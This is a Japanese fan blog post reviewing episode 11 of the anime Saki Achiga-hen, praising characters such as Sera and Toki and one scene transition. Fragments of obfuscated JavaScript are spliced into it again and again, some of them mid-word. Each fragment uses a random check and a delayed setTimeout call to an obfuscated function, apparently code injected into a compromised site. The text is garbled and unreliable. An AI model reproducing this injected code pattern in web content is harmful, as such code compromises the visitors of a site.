咲-Saki-阿知賀編 episodom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}de of sidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}de-A 第11局「決意」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”so18204798″]

ネタバレあり

更新おそすぎで申し訳ないです。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

アラフォーもとい、アラサー可愛すぎる。

でも麻雀すると魔王的な存在になるんでしょうね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

セーラマジセーラ。

正直、最初はうっとおしい感じで好きじゃなかったんですが徐々に気に入りはじめ

このシーンで、セーラいい子だな。

と、落とされました。

やるな、セーラ。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

つぶれあんぱんみたいな顔しやがって・・・

くそ、それでもかわいいぜ。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

玄じゃなくて、今度は、怜の涙目。

しかし、可愛いと思うよりもやばげな感じ。

そして、この回想から戻るシーン。

飛行機から街並みをみるシーンから照明に戻るあたりの映像よかった。

テンションあがりまくる。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

やっぱり玄ちゃんの涙目が安心してみられるわ。

いまだにほとんど出番ない。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

そして、最後にトリプルきた。

第3の目がきちゃいました。

ここでEDにはいるというテンションあがりっぱで終了。

もう、やばすぎですね。

怜まじ主人公。

コメントを残す